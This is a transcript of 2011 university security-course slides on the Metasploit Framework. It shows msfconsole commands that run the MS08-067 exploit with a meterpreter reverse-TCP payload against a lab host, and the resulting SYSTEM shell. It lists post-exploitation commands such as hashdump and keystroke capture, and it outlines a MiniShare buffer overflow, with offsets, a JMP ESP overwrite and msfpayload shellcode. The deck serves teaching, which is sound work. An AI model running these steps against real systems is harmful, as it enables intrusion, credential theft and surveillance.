Anthony Gabrielson Adam Helbling The University of Massachusetts Lowell 91.661 Project - 1 5/4/2011
Download
Report
Transcript Anthony Gabrielson Adam Helbling The University of Massachusetts Lowell 91.661 Project - 1 5/4/2011
Anthony Gabrielson
Adam Helbling
The University of Massachusetts Lowell
91.661 Project - 1
5/4/2011
Agenda
•
Part 1: The Metasploit
Framework
– Basics
– Running Metasploit
– The Exploit
– Demo
– More on Exploits
91.661 Project - 2
5/4/2011
•
Part 2: From ‘ploit’ to ‘ploit’
– Overview
– Assumptions
– Environment Setup
– Ollydbg Introduction
– Vulnerability Explanation
– Crafting the Exploit
– Metasploit Enablers
– Adding Shellcode
The University of Massachusetts Lowell
The Metasploit Framework: Basics
• Created in 2003 by HD Moore
• Vitals
– BSD License
– 700K lines of Ruby
• Currently produced by Rapid 7
• De facto standard in vulnerability development framework
– Commercial Alternatives
Rapid 7 has many commercial implementations
Immunities CANVAS
Core Impact
91.661 Project - 3
5/4/2011
The University of Massachusetts Lowell
The Metasploit Framework: Basics
(cont’d)
• Metasploit is a well known anti-forensic and evasion tool
• Modular for ease of development and portability
• msfupdate
•
• Get the latest & greatest exploits
msfconsole
• The console – also works as a command shell
• Exploit Automation
• Db_autopwn
• Very noisy
• Requires a database
91.661 Project - 4
5/4/2011
The University of Massachusetts Lowell
The Metasploit Framework: Running
Metasploit
91.661 Project - 5
5/4/2011
The University of Massachusetts Lowell
The Metasploit Framework: The Exploit
• ms08_067_netapi (RANK: Great)
– This module exploits a parsing flaw in the path
canonicalization code of NetAPI32.dll through the
Server Service. This module is capable of bypassing
NX on some operating systems and service packs. The
correct target must be used to prevent the Server
Service (along with a dozen others in the same
process) from crashing. Windows XP targets seem to
handle multiple successful exploitation events, but
2003 targets will often crash or hang on subsequent
attempts. This is just the first version of this module,
full support for NX bypass on 2003, along with other
platforms, is still in development.
– This attack can be prevented with the MS08-067 patch.
91.661 Project - 6
5/4/2011
The University of Massachusetts Lowell
The Metasploit Framework: Demo
91.661 Project - 7
5/4/2011
The University of Massachusetts Lowell
The Metasploit Framework: Demo
Walkthrough
• Msfconsole
–
–
–
–
–
use exploit/windows/smb/ms08_067_netapi
set PAYLOAD windows/meterpreter/reverse_tcp
set RHOST [remote host] 192.168.11.51
set LHOST [local host] 192.168.11.53
show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- ----------RHOST 192.168.11.51 yes
The target address
RPORT 445
yes
Set the SMB service port
SMBPIPE BROWSER
yes
The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name
Current Setting Required Description
------------------ -------- ----------EXITFUNC thread
yes
Exit technique: seh, thread, none, process
LHOST 192.168.11.53 yes
The listen address
LPORT 4444
yes
The listen port
– Exploit
91.661 Project - 8
5/4/2011
The University of Massachusetts Lowell
The Metasploit Framework: More about
the Exploit
• msf exploit(ms08_067_netapi) > show targets
Exploit targets:
Id Name
-- ---0 Automatic Targeting
1 Windows 2000 Universal
2 Windows XP SP0/SP1 Universal
3 Windows XP SP2 English (NX)
4 Windows XP SP3 English (NX)
…
61 Windows 2003 SP2 Japanese (NO NX)
91.661 Project - 9
5/4/2011
The University of Massachusetts Lowell
The Metasploit Framework: Meterpreter
Commands
•
Commands
– meterpreter > sysinfo
System Language : en_US
OS
: Windows XP (Build 2600, Service Pack 2).
Computer
: AGABRIEL-B90B23
Architecture : x86
Meterpreter : x86/win32
– meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
– meterpreter > shell
Process 396 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
– More
Hashdump
Upload
Webcam_snap
keybscan_{start, stop, dump}
ps
91.661 Project - 10
5/4/2011
The University of Massachusetts Lowell
From ploit to ploit: Overview
…or how to add a generic exploit to your metasploit
arsenal
• Q: What can you do with a known vulnerability?
•
•
•
– Craft an exploit, execute from a command-line
– What else?
Metasploit is not perfect, but it has its place.
– Repository
– Framework
– Tools to help build exploits
– Ease of use
Generic shellcode vs. robust shellcode
Challenges:
– Crafting the exploit
– Reuse of an exploit
91.661 Project - 11
5/4/2011
The University of Massachusetts Lowell
From ploit to ploit: Assumptions
• Already spent resources (time, money, etc.) to discover a
vulnerability via one (or all) of the following:
– Fuzzing
– Static disassembly
– Review of source code
– Known vulnerability
CVE we found on (http://cve.mitre.org/)
Security Advisory (http://secunia.com/advisories)
– Known Exploit
Exploit DB (http://www.exploit-db.com/exploits)
91.661 Project - 12
5/4/2011
The University of Massachusetts Lowell
From ploit to ploit: Environment Setup
• Vulnerability: MiniShare HTTP “GET” Request Buffer
•
•
•
•
•
91.661 Project - 13
5/4/2011
Overflow Vulnerability
Exploit: MiniShare Remote Buffer Overflow Exploit (c
source)
Windows XP SP2 (or really any XP version)
MiniShare 1.4.1
Ollydbg 1.10
Backtrack 4
– Metasplioit
– Python
– Netcat
The University of Massachusetts Lowell
From ploit to ploit: Ollydbg Introduction
• Main Pane:
•
•
•
91.661 Project - 14
5/4/2011
– CPU Instructions (Microsoft Assembler format)
Memory Pane:
– Current section of memory where the code is executing
Registers Pane:
– EIP: Address of next instruction to be executed
– ESP: Stack pointer
Stack Pane:
– Shows the entries on stack
The University of Massachusetts Lowell
From ploit to ploit: Vulnerability
Explanation
• HTTP GET with a large (>1787 bytes) request
•
•
91.661 Project - 15
5/4/2011
– GET [a string of >1787 bytes] HTTP/1.1\r\n\r\n
EIP = 0x41414141
– Access violation when reading [41414141]
– EIP points to the address containing the next
instruction, but 0x41414141 throws an access violation.
ESP = the address of the buffer that was overflowed.
– Note the “AAAAAAAAAAAAAAAAAA……AAAA”
The University of Massachusetts Lowell
From ploit to ploit: Crafting the Exploit
•
This approach is different then the lab exercise assigned.
– We are not overwriting stack’s return address here
– Instead let’s find an instruction in the code to transfer our
execution:
\xFF\xE4 = JMP ESP – Jump to the address stored in ESP.
Overwrite EIP with the address of a JMP ESP instruction.
•
More robust to some degree because we will pick an address that
is predictable and will work across more systems.
– In Win XP SP2 there is no randomization of base location for
where DLLs are loaded, therefore if we chose a DLL it will
work on each system that loads this DLL.
– However, the best choice would be a DLL provided with
MiniShare, however, there are none, so we revert to using a
Windows DLL.
91.661 Project - 16
5/4/2011
The University of Massachusetts Lowell
From ploit to ploit: Metasploit Enablers
• /pentest/exploits/framework3/tools/pattern_create.rb
•
– Creates a unique pattern of a user specified length.
Useful for understanding the offsets within the
buffer where we overwrite.
/pentest/exploits/framework3/tools/pattern_offset.rb
– Returns the location of where EIP is overwritten and
where ESP points to.
Finds offsets using from the pattern generated by
pattern_create.rb
• EIP overwritten at 1787 bytes into our buffer
• ESP points to location 1791 bytes into our buffer
91.661 Project - 17
5/4/2011
The University of Massachusetts Lowell
From ploit to ploit: Adding Shellcode
• Using msfpayload which comes with Metasploit we will
create a useful piece of shellcode which creates a reverse
shell on a port.
– What is a reverse shell?
– Note: Does this give us away?!
– C style vs. raw output (‘R’ vs. ‘C’)
• Does anyone see a problem with some of this shellcode?
– Msfencode can help us…
• Let’s add some NOP’s to help improve stability.
• Now all that would need to be done is to add this to
Metasploit as a ruby script. (Note: It’s already in there)
91.661 Project - 18
5/4/2011
The University of Massachusetts Lowell
References and Conclusions
• http://grey-corner.blogspot.com/2010/01/beginning-stack•
based-buffer-overflow.html
This presentation just begins to scratch the surface
– http://www.offensive-security.com/metasploitunleashed/Metasploitable
Questions?
91.661 Project - 19
5/4/2011
The University of Massachusetts Lowell
The Metasploit Framework: The Exploit
(2)
• psexec
– light-weight telnet-replacement that lets you execute
processes on other systems
– This module uses a valid administrator username and
password (or password hash) to execute an arbitrary
payload. This module is similar to the "psexec" utility
provided by SysInternals. This module is now able to
clean up after itself. The service created by this tool
uses a randomly chosen name and description.
– This one has more, list ‘em
91.661 Project - 20
5/4/2011
The University of Massachusetts Lowell
The Exploit (3)
• ms05_039_pnp
– Vulnerability in Plug and Play Could Allow Remote
Code Execution and Elevation of Privilege
– This module exploits a stack buffer overflow in the
Windows Plug and Play service. This vulnerability can
be exploited on Windows 2000 without a valid user
account. NOTE: Since the PnP service runs inside the
service.exe process, a failed exploit attempt will cause
the system to automatically reboot.
– Affected Systems: Win2k SP4, Win XP SP2, etc…
91.661 Project - 21
5/4/2011
The University of Massachusetts Lowell